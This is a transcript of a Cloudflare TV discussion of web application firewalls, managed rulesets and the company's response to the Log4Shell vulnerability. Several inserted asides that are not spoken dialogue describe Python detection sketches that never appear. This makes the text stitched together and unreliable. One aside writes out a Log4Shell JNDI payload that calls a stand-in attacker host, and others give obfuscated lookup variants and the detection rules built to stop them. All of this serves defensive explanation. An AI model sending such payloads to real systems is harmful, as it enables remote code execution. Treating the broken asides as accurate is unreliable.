Security Week Discussion: Log4J
Presented by: Michael Tremante, Gabriel Gabor, Andre Bluehs
Originally aired on July 12, 2022 @ 12:00 PM - 12:30 PM EDT
Join Cloudflare's Product Management team to learn more about the products announced today during Security Week.
Read the blog posts:
- A bridge to Zero Trust
- Cloudflare partners with Microsoft to protect joint customers with a Global Zero Trust Network
- Introducing SSH command logging
- Zero Trust client sessions
- Managing Clouds - Cloudflare CASB and our not so secret plan for what's next
Tune in daily for more Security Week at Cloudflare!
Transcript (Beta)
Hello everyone and welcome to Cloudflare TV. My name is Michael Tremante.
I'm going to be your host today.
Really excited.
It's Friday today.
We're getting towards the end of Security Week.
Still a lot of great announcements.
But today the topic is going to be Log4j and specifically a very high severity vulnerability that happened back in December.
Log4Shell.
And also, we're going to talk a little bit about web application firewalls in general.
I'm a product manager and have been at Cloudflare for quite a few years.
I work on application security.
But the great guests with me today are, of course, Andre and Gabriel.
Thank you very much for joining.
And before we dive in, I guess, Gabriel, a couple of words about yourself.
Hi.
Hello. So, I'm Gabriel. Gabriel Gabor.
I'm a software engineer in the managed rules team, which is the team managing all the WAF-related products.
Awesome.
And Andre, over to you.
Hi there. I'm Andre Bluehs.
I lead the WAF teams generally, so I'm in charge of the team that was working on this.
So when we did the prep for this, you asked me if I pronounce it log forge or Log4j.
I'd never heard it called log forge before.
It's always Log4j.
I don't know how to pronounce it, to be honest.
I was asking to see if you knew the actual.
The actual answer.
No, I don't.
Great.
So, yeah, Andre. Andre and I work very closely together on all things WAF related.
Great.
So before we actually jump in to the topic, a few housekeeping items for those of you who are listening.
Of course, if you do want to submit questions, please email livestudio@cloudflare.tv.
If we do receive questions, we'll try to answer them towards the end of the session.
If for any reason we don't get to them, we'll definitely follow up.
And of course you can reach out any time to support team or if you're an enterprise customer, please reach out to your customer success manager and they will be able to put us in contact directly or answer the questions with your solutions engineer.
And with that, let's talk about WAF a little before we talk about Log4j.
Andre, I think you've been working with the WAF for quite some time. For everyone who's listening, what is a WAF at a high level?
Sure.
Well, it stands for Web Application Firewall. And so that's a pretty accurate description.
And so its goal is to protect web applications, or servers generally, from various kinds of malicious attacks.
So things like SQL injection or cross-site scripting or this Log4j that we're going to talk about.
Definitely not log forge.
It's the worst combination of those two things.
And so the way that it works here at Cloudflare is that Cloudflare is a reverse proxy.
And so we are able to process requests before they get to origin servers.
And we can really do our best to stop malicious requests before they get to origin servers, because our customers' traffic stops at Cloudflare first. And so on the WAF team, what we do is we build rules for our WAF.
And so earlier this week we actually talked about the machine learning that we announced and that we have built. What we actually did was we took our rule base and used that as a starting point to help us train, and as kind of a benchmark for, our ML.
And those rules consist of various kinds of matching against patterns, whether that's in the request or bits about the request.
Does a particular header contain those kinds of things?
And there's a lot of regex matching in there.
And so that's really the goal of the WAF: to be able to protect our customers' servers and protect as much as possible.
And so on the managed rules team, we focus on a global WAF, which is that we provide rules that are general purpose.
So things for large kinds of attacks, or another common one is narrowing down the kinds of requests that you want to allow to your server.
Like, is it only a GET or is it only a POST kind of request?
Those kinds of things, general purpose rules for our customers.
Whereas we also have a team that focuses on the custom side of things.
So giving our users the ability to build arbitrarily complex rules and look for things that aren't necessarily applicable to other organizations or other teams or things like that. That's the custom side.
But we're focused on building things that have the highest impact.
And so that's quite a bit of a challenge, because we have to make sure that not only is it applicable, but we really have to pay attention to false positives as well.
And we'll talk about this when we get to Log4j: building rules is a process, and it's quite challenging.
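As a rough illustration of the rule matching described above (patterns matched against parts of the request, plus a rule that narrows the allowed HTTP methods), here is a minimal Python sketch. The `Request` class, the rule IDs, and the two regular expressions are hypothetical and chosen only for illustration; they are not Cloudflare's rules or rule engine.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Request:
    """Hypothetical, simplified view of an HTTP request."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: str = ""


# Toy patterns for illustration only; real rules are far more careful
# about false positives.
SQLI_PATTERN = re.compile(r"(?i)\bunion\b\s+\bselect\b|'\s*or\s+1\s*=\s*1")
XSS_PATTERN = re.compile(r"(?i)<script\b")


def fields_to_inspect(req):
    """Yield every string in the request that the toy rules look at."""
    yield req.path
    yield req.body
    yield from req.headers.values()


# Each rule is a (rule_id, predicate) pair. The IDs are made up.
RULES = [
    ("toy-sqli", lambda r: any(SQLI_PATTERN.search(v) for v in fields_to_inspect(r))),
    ("toy-xss", lambda r: any(XSS_PATTERN.search(v) for v in fields_to_inspect(r))),
    ("toy-method", lambda r: r.method not in {"GET", "POST"}),
]


def evaluate(req):
    """Return the IDs of all rules that match the request."""
    return [rule_id for rule_id, matches in RULES if matches(req)]
```

A reverse proxy built along these lines would call `evaluate` on each request before forwarding it to the origin and block or log when the returned list is non-empty.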
Got it.
Yeah. And so just to recap, if I'm running a website, and I think the most common example is WordPress, I can essentially place my WordPress app behind Cloudflare, and Cloudflare, if I have access to the WAF,
of course will make sure that people don't break into my site.
Is that a good summary?
And then actually to that point, Andre, any other advantages of using Cloudflare as the WAF compared to, for example, I know Apache has a ModSecurity module, right?
Which implements WAF-type features. Why would I use Cloudflare versus something like ModSecurity?
Sure.
So interestingly, we actually used the same thing for a long time. Our WAF, way back in the day, originally written by our CTO, John Graham-Cumming, used Apache and ModSecurity to do those kinds of things.
And so really the advantage that we have is scale.
We are able to analyze different kinds of attacks and attack vectors, and if we can detect a particular attack that's happening on a subset of Internet properties, then we can apply that protection globally.
And so the benefits of allowing us to help protect you from those kinds of things is that you get the protection that everyone else gets as well.
Yeah, that's a good point.
And the way I also like to think about it is that ideally security should not come at the expense of performance, which I think ties really well with the scale factor.
If you're running your own WAF on your own hardware, be it software, virtualized, or a separate box, you need to worry about scale.
If your site increases in traffic, you might reach the limit of the WAF before you would reach the limit of your app itself.
But with Cloudflare that doesn't apply anymore.
Right.
And performance, yes.
And, sorry to talk over you, you were talking about putting it in front of WordPress.
And that's not the only thing we protect.
You can you can really put anything behind Cloudflare, whether it's your application server or your mail server or anything that talks through the Internet you can put behind Cloudflare and our WAF can protect you against those kinds of things.
And so we actually have some specific rules that aren't just aimed at web servers or even things like WordPress or applications or things like that.
We have some other kinds of protections.
We use signals from different kinds of places. For example, we partner with our bots team.
And so we have some rules in our WAF that our customers can turn on, like: is someone pretending to be Googlebot or some other bot, or something like that?
And so it's not even just "I have a WordPress or a Ghost or a custom application behind us and we want to protect it from all kinds of things."
It's a general-purpose kind of protection, the managed rules that we provide.
Yeah.
And actually to that point, you mentioned, Andre, that the managed rulesets we provide are part of the value of the WAF.
Right.
So we have rules, I think, covering most things. And Gabriel, you've worked a lot on the managed rules component of the WAF.
I'd like to think again that if you buy a WAF, that's the engine.
But then the actual rules themselves are what's stopping the bad stuff from hitting your origin.
Do you mind telling us a little bit about the managed rules offerings that come with Cloudflare?
Sure.
Sure. So I think the managed rulesets are really one of the best parts of the Cloudflare WAF.
We put a lot of effort into always improving them and making sure that they're fast.
We're doing a lot of work behind the scenes to make sure it's all optimized.
So compared to a WAF which someone could deploy on their own, like ModSecurity, which will always lag behind,
Cloudflare is always really up to date.
And I'm going to discuss three rulesets which are part of the core of the WAF.
The first one is the Cloudflare Managed Ruleset. This is really where all the security analysts spend a lot of time just iterating on rules and making sure that those attacks or those cases are really mitigated.
So more specifically about the Cloudflare Managed Ruleset: we have some really interesting advanced SQL injection mitigations.
We spend a lot of time just researching and making sure that we block the vast majority of SQL injection attacks with with this ruleset.
We also spent some time just making sure that a lot of cross-site scripting attacks are covered.
And this is really also the place where we put a lot of the zero days, the vulnerabilities that appear.
So for example, Log4j, which we'll discuss, but also the Microsoft Exchange Server vulnerability which appeared last year in the middle of the year.
So this is really where, constantly, on a more than weekly basis,
we have new rules.
Other than this, we also offer an OWASP managed ruleset.
So for context, OWASP is a foundation which is really focused on security, and they offer the really great OWASP Core Ruleset, which defends against the OWASP Top 10 attacks.
And this covers a really broad range of attacks. So we definitely support this in the Cloudflare WAF. Customers are able to enable it, and then they can also set different levels of aggressiveness.
So basically they can go a bit more aggressive or not based on their use case, based on the apps that they use.
The word, I think you were hesitating to say was paranoia.
So in our UI, it's called paranoia level.
Yeah, yeah, that's true.
So yeah.
And other than that, we also have a new managed ruleset, which is the leaked credentials check ruleset.
This is really awesome.
I think it was announced last year, and it really focuses
on all the cases where applications suffer credential stuffing attacks.
So for all the content management systems like Joomla or Drupal or Ghost or Magento, there are certain databases with leaked usernames and passwords.
So if there's a user who really wants to make sure that their users are not compromised by these leaked credentials, this ruleset is really a great fit.
Yeah.
These are just three of them. But yeah, we'll probably have some more in the future.
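To make the leaked credentials idea concrete, the following Python sketch checks a login attempt against a set of known-leaked username and password pairs. It is only an illustration under stated assumptions: the function names, the fingerprint format, and the in-memory set are hypothetical, and a production system would normally use a privacy-preserving lookup rather than a plain set. Nothing here describes how Cloudflare's ruleset is actually implemented.

```python
import hashlib


def credential_fingerprint(username, password):
    """Hash a username/password pair so raw credentials are not stored.

    The username is lowercased first; the NUL byte separates the two
    fields so that ("ab", "c") and ("a", "bc") hash differently.
    """
    data = f"{username.lower()}\x00{password}".encode("utf-8")
    return hashlib.sha256(data).hexdigest()


# Hypothetical database of leaked pairs, stored only as fingerprints.
LEAKED = {credential_fingerprint("alice@example.com", "hunter2")}


def is_leaked(username, password, leaked=LEAKED):
    """Return True if this exact pair appears in the leaked set."""
    return credential_fingerprint(username, password) in leaked
```

A login handler could call `is_leaked` on each attempt and, on a match, force a password reset or add a second authentication step instead of blocking outright.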
Yeah.
Yeah. And do the customers need to choose between one or the other, or can they deploy all three at the same time?
No, definitely.
The offering is really customizable, so they can enable any ruleset, in whatever order, and they can set the priority.
They can even go deeper and select certain categories.
For example, if you have a WordPress website and you want to protect only against WordPress attacks, you can easily set only the WordPress rules to be more aggressive and to block more.
So it's really customizable.
And then you can also go into the OWASP ruleset and set certain paranoia levels, and you can even add your own custom rules.
So it's really customizable.
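The paranoia level mentioned above can be pictured with a small Python sketch of anomaly scoring, the general approach the OWASP Core Ruleset takes: each matching rule adds to a score, higher paranoia levels switch on more rules, and the request is blocked once the score reaches a threshold. The rules, scores, and threshold below are made up for illustration and are not taken from the real ruleset.

```python
# Hypothetical rules: (rule_id, minimum paranoia level, score, substring).
RULES = [
    ("toy-1", 1, 5, "union select"),
    ("toy-2", 1, 5, "<script"),
    ("toy-3", 2, 3, "--"),
    ("toy-4", 3, 2, "'"),
]


def anomaly_score(payload, paranoia_level):
    """Sum the scores of all enabled rules whose substring appears."""
    text = payload.lower()
    return sum(
        score
        for _rule_id, min_level, score, needle in RULES
        if min_level <= paranoia_level and needle in text
    )


def should_block(payload, paranoia_level=1, threshold=5):
    """Block when the accumulated score reaches the threshold."""
    return anomaly_score(payload, paranoia_level) >= threshold
```

With these toy values, the harmless text `it's a test -- really` passes at paranoia level 1 but is blocked at level 3, which is the trade-off between coverage and false positives that the setting controls.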
Yeah, yeah.
No, that's awesome. And I think the credential one you mentioned is pretty exciting for me.
It's built on, you know, the new WAF engine we announced last year during Security Week, and we're starting to build on it and get the benefits out of it.
And that's definitely more in the advanced sort of feature set.
And I remember when we tested on our first customers, we detected some pretty interesting brute force attacks just by checking for logins
with compromised credentials. With that, though,
the topic for today, of course, is Log4j, or the Log4Shell vulnerability, depending on how you want to read it.
Before we jump in on what we did when it was discovered and announced in December,
Andre, I think it might be best for you to talk about this. What was the vulnerability?
What did attackers sort of discover here?
Sure.
So a little bit of context about what Log4j is. It's kind of what it says on the tin.
It's a logging library for Java, the Java programming language.
And it's kind of a go-to, industry-standard way of logging things with Java.
And so it's grown over time and has accumulated quite a large surface area of functionality.
And so in this particular attack,
what the people who exposed this attack realized was that it is so powerful it can execute arbitrary things.
And specifically in this particular case, what it did was try to go and fetch things and then try to execute them.
And so it's a consequence of this becoming such a mature library and having so many features that over time things just got added.
And it was kind of, the features kind of cross-pollinating and becoming so powerful that it could do a whole lot of things.
And people didn't realize that these these consequences existed.
And so this attack was dangerous for a whole bunch of reasons, first and foremost because it's so prevalent.
It was used in so many different kinds of applications, and there were knock-on effects: because it's so prevalent, it's used in very popular Java applications, and those Java applications are used in more and more places.
And so there was a multiplying effect: this one library, used by so many things, was vulnerable.
Therefore, all of those things are vulnerable. And so that's the context around what Log4Shell is and, generally, what Log4j is.
And so in a nutshell, Log4j allows you to put some arbitrary kind of markup into a logging string, say you want to drop in some information about what's going on in that particular line of code.
And one of the things that you could do was reach out and go fetch something and then execute it.
Got it.
So essentially an attacker would find a way to add this string to your logs.
It's actually really easy to compromise once you think about it, right?
Generate a request to a web server that has a special string in it. If it ends up in the logs and those logs get parsed,
chances are you're compromised.
Yeah, exactly.
So it's part of a whole class of vulnerabilities called RCE, remote code execution.
And so, you know, it's a well-known phenomenon. It's not unheard of for these kinds of things to happen.
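For readers who have not seen one, the "special string" in the most basic Log4Shell attempts is a Log4j lookup of the form `${jndi:ldap://attacker.example/a}`, placed in any request field that the application is likely to log, such as the User-Agent header. The Python sketch below flags only that basic form. The function name, the protocol list, and the example hostname are illustrative assumptions, not a description of any production rule.

```python
import re

# Matches only the plain, unobfuscated form of the lookup.
BASIC_JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)


def looks_like_basic_log4shell(headers):
    """Return True if any header value contains a plain JNDI lookup."""
    return any(BASIC_JNDI.search(value) for value in headers.values())
```

Because it matches a very specific shape, a check like this is unlikely to flag legitimate traffic, but it is also easy to evade with obfuscation.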
Yeah.
Whenever I hear remote code execution, that should immediately be at the top of the list of severities, because it normally results in full server takeover.
Right.
Yeah. So from memory, unfortunately, but maybe as expected, all of this happened, at least for some of us, just before the holidays.
As you know, security teams might be taking some time off then and then these sort of things happen.
Gabriel, I think you were vital in the efforts of us preparing our mitigations.
How did it all play out? Do you mind giving us a bit of the story of what happened in those first days?
Sure.
Sure. So I think the vulnerability really was introduced quite early on. It was introduced in Log4j, I think it was 2.0, a beta version, and it continued until 2.14, and then it was really fixed in 2.16.
But the vulnerability became public on the ninth of December.
And really 9 minutes after the vulnerability became public, we started to see large volumes of attacks.
It was really, really, really incredible.
So I was on call that day and I got paged at five in the morning and I got online and I looked at the vulnerability and kind of saw or started to realize how much impact this thing could have.
It looked really bad, but I wasn't fully aware at that time in the morning of how bad this could be.
So initially it was really just one customer asking, do we protect against this?
We need protection for this. So given that it was before hours, and the London team was not really online, I couldn't really deploy a rule on my own.
So the initial step was really to start to see the real impact and the variations of this.
So we started to deploy rules just to make sure and to gather information about the attack, to see what it really looks like in the wild.
And at the same time, we started to advise the customers who started to ask about this, and we really just gave them ways to protect against this just immediately.
And then we knew that this is so, so important that we have to release a rule as soon as possible.
So at that point I escalated, and Andre came online and the rest of the team came online, and we really started to look at the payloads. I think just a few hours after we heard about the attack, we had already deployed a rule.
And actually the release procedure for a rule is quite important here, because we are aware that a rule can have a significant impact
on the customers.
So we really put in a lot of effort to make sure that these rules do not have false positives.
And this is really one of the core things about the WAF. We basically deployed certain test rules just to see which one would catch the most attacks and would have reduced false positives.
And we decided to release a very safe version of the rule, which we knew we would then have to iterate on.
But the priority then was to really get a protection out there as soon as possible to cover most of the attacks, because I think a very high percentage of the attacks were really basic ones, just using the JNDI keyword and the LDAP keyword.
So.
We basically built a rule which is really safe and we did an emergency release, but we knew that our job was not done yet and that we really had to continue.
And it was, I think at that point it was already midday and we were starting to realize the impact of this.
There were multiple groups inside the company focusing on protecting the whole network and all the clients at different levels, for example, logging that customers could then get.
So the effort was really company-wide.
But in the WAF team, we then started to iterate on the rules.
So we already had some test
rules just looking for variations.
We started to discover that there are so many ways in which you can obfuscate this attack.
So we started to protect against that and to make sure that the false positive rate is low.
And then we just kept going
and iterating. I think by the end of that day we already had a second version released, and we had already started to contact customers who were impacted by this.
And then, yeah, the second day, I think we found some new variations.
And that was actually really important because the amount of traffic, the amount of attacks with the new variation was significant.
So we had to fix that again.
So we spent another day iterating and making sure that we capture as many attacks as possible.
And at some point we really discovered that Log4j can be extremely dangerous in this case, because there's a whole language and there are so many ways in which you can obfuscate that attack and just
make it go through. So we started to think about creating some really aggressive rules which would catch all these attacks.
But we knew that we can't really avoid false positives with them.
So I think the rule is 100517. That's a rule which is disabled by default but is extremely aggressive and catches anything.
And yeah, so we started to iterate again on that second day and we made sure that
most of the attacks are covered, and also that we have some new rules which users could turn on by themselves if they want even more protection.
And at that point we...
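The obfuscation problem described above comes from Log4j's lookup language allowing nesting, so `${${lower:j}ndi:...}` or `${${::-j}${::-n}${::-d}${::-i}:...}` still resolve to `${jndi:...}`. The Python sketch below shows one way to picture the two kinds of rule discussed: a conservative rule that first resolves a few simple nested lookups and then looks for `${jndi:`, and an aggressive rule that flags any `${` at all. Everything in it (function names, which lookups are resolved, the iteration cap) is an assumption made for illustration, and it covers only a small part of the real lookup syntax.

```python
import re

# An innermost lookup: "${...}" with no nested "$", "{" or "}" inside.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(match):
    """Resolve a few simple lookups; leave anything else untouched."""
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # "${anything:-default}" is treated as falling back to the default.
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize(text, max_passes=10):
    """Repeatedly resolve innermost lookups until nothing changes."""
    for _ in range(max_passes):
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def conservative_match(text):
    """Flag only input that normalizes to a JNDI lookup."""
    return bool(JNDI.search(normalize(text)))


def aggressive_match(text):
    """Flag any lookup syntax at all; expect false positives."""
    return "${" in text
```

The aggressive check also fires on harmless template-like text such as `Total: ${price}`, which is why a rule of that kind would plausibly be left off by default and enabled only by users who accept the false positives.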
Yeah. No.
And I think that's a really good segue, actually, to what I was going to ask next.
Well, first of all, you mentioned we were deploying new rules constantly.
All of this whilst there was actually an internal incident declared to make sure we were not affected.
But at some point, we made the decision to protect everyone.
And Andre, I think you were part of that conversation.
How did that play out?
How did we realize we should deploy these rules to all zones?
Yeah.
And so we have a little bit of precedent for this. We have done this previously, and we didn't really talk about it much, honestly.
We were protecting all of our customers, regardless of free or whatever plan you're on, from things like Shellshock or some small bits of WordPress,
because both of those things are so popular. And so the call was made to do the same thing for Log4j because it had such a high impact and such prevalent use.
We wanted to give this to as many people as possible.
And so Gabriel's been talking about the different versions of rules that we had.
And it was really tricky. And we have this problem with a bunch of different classes of rules that we build, for instance, SQL injection.
There's a trade off between detecting things that look like SQL, like a select statement or something like that, and things that are malicious.
And so we had a similar kind of problem here where we could detect things that kind of looked like this attack.
And honestly, a lot of things that just look like JSON kind of looked like this attack. Or we could be a little bit more safe and detect things that were definitely this attack.
And so we had different kinds of rules.
And so the decision was made to give the more conservative, "this is definitely an attack" rules to all of our customers, regardless of what plan they were on or how much they were using Cloudflare.
Right.
And, you know, I'm always impressed by the efforts we put in here as a company towards that.
Those of you who are following Security Week may have noticed that on Tuesday we announced WAF for everyone, and it's efforts like these that drive our ability and our desire to protect any zone on Cloudflare if the vulnerability is high-impact and wide-reaching.
And we're in a position where we can help and do something about it.
We want to.
So that's something to look forward to.
To that point, last question.
We've got really a couple of minutes, one minute and a half left.
Gabriel, I think you're also helping with the Cloudflare Free Managed Ruleset we announced, which will include Log4j rules.
What are the things that we're including there out of the box?
Sure.
So in the process, we really want to make sure that we cover these kind of zero day attacks, which everyone needs.
And as Andre mentioned, there's also Shellshock, which is a Unix Bash shell vulnerability, which can lead to arbitrary execution of any command.
So that's really dangerous. And it happened back in 2014.
And we've been offering protections for this in the WAF for a while, but it's really essential; all the users need it.
So we're including that in the free ruleset.
And we also know, I mean, WordPress is used at a really large scale, and there are certain attacks which are constantly tried on every website.
And they're quite easy to see.
So we also include the protections for certain attacks.
And then we also have a lot of more advanced protections in the actual WAF, in the Cloudflare Managed Ruleset.
But in the free one, we give this basic layer of protection for WordPress, and we're actually working on adding some more,
which will probably be announced later on.
Yeah, yeah.
No, absolutely. I think if something along the lines of Log4j comes along, we will make sure we add those rules to the Cloudflare Free Managed Ruleset.
With that, of course, I really enjoyed this session.
Hopefully our viewers enjoyed it too.
Thank you very much, Andre and Gabriel.
I think that what happened over last December was a really good experience, even from a broader cybersecurity perspective.
And for those of you listening, email livestudio@cloudflare.tv with any questions, and there's more to come with Security Week tomorrow.
So please check out our blog.
Stay tuned. With that,
thanks again and see you soon on Cloudflare TV.